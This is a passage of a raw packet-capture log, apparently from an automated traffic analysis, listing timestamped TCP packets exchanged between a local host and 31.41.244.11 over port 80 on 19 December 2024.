                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.857480049 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.857501030 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.857533932 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.857616901 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.858658075 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.858730078 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.859473944 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.859486103 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.859498024 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.859529018 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.859555006 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.860922098 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.861080885 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.861629963 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.861643076 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.861659050 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.861674070 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.861685038 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.861706972 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.863993883 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.864017010 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.864028931 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.864074945 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.864729881 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.864784002 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.866332054 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.866344929 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.866355896 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.866436958 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.866679907 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.867034912 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.867047071 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.867055893 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.867085934 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.867106915 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.908008099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.908046961 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.908083916 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.908086061 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.908128977 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.908128977 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.908554077 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.908587933 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.908621073 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.908622026 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.908644915 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.908667088 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.908898115 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.908941984 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.909006119 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.909040928 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.909090042 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.909437895 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.909471989 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.909483910 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.909564972 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.909868002 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.909900904 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.909924030 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.909944057 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.909944057 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.909992933 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.910433054 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.910466909 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.910507917 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.910532951 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.910680056 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.910733938 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.910768032 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.910784006 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.910825968 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.911205053 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.911256075 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.911374092 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.911426067 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.911508083 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.911541939 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.911647081 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.911971092 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.912004948 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.912036896 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.912075996 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.912105083 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.912717104 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.912751913 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.912782907 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.912810087 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.912831068 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.912864923 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.912889004 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.912926912 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.913403988 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.913438082 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.913526058 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.913870096 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.913903952 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.913917065 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.913938999 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.913959980 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.913997889 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.914570093 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.914606094 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.914644957 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.914660931 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.914700031 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.915391922 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.915426016 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.915503025 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.915935993 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.915968895 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.916001081 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.916002989 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.916028976 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.916060925 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.916872978 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.916923046 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.916924953 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.916956902 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.916969061 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.917009115 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.917749882 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.917785883 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.917815924 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.917840958 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.918142080 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.918176889 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.918210983 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.918211937 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.918229103 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.918263912 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.918855906 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.918931961 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.918950081 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.918983936 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.918993950 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.919102907 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.919605017 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.919640064 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.919675112 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.919708967 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.919720888 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.920488119 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.920521975 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.920569897 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.920572042 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.920604944 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.920619011 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.920670033 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.921272039 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.921305895 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.921327114 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.921339989 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.921355963 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.921380997 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.921924114 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.921983004 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.922023058 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.922035933 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.922092915 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.922547102 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.922581911 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.922610998 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.922622919 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.041867018 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.041924953 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.041939020 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.041986942 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.042023897 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.042370081 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.042409897 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.042551041 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.042563915 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.042622089 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.042795897 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.042907953 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.043067932 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.043081045 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.043104887 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.043122053 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.043466091 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.043479919 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.043514013 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.043884993 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.043896914 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.043910027 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.043927908 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.043941021 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.043960094 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.044517994 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.044567108 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.047534943 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.047571898 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.047629118 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.048207045 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.048249006 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.048264027 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.048302889 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.049114943 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.049151897 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.049196959 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.049796104 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.049832106 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.049844027 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.049877882 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.051821947 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.051856995 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.051886082 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.051907063 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.052388906 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.052426100 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.052442074 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.052476883 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.053666115 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.053719044 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.053745031 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.053755045 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.053762913 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.053797007 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.054378986 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.054435968 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.056694031 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.056747913 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.056751966 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.056788921 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.056798935 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.056830883 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.057437897 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.057483912 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.058321953 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.058959007 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.058995008 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.059016943 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.059030056 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.059043884 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.059067011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.059071064 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.059112072 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.059623957 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.059674025 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.099397898 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.099447966 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.099489927 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.099493980 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.099523067 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.099533081 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.099633932 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.099678040 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.099936008 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.099971056 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.099987984 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.100023985 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.100317955 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.100363016 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.100503922 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.100545883 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.100749969 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.100785017 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.100795984 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.100833893 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.101002932 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.101037979 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.101083994 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.101396084 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.101432085 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.101578951 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.101861000 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.101895094 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.101912975 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.101932049 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.101938009 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.101978064 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.102521896 CET804974331.41.244.11192.168.2.4
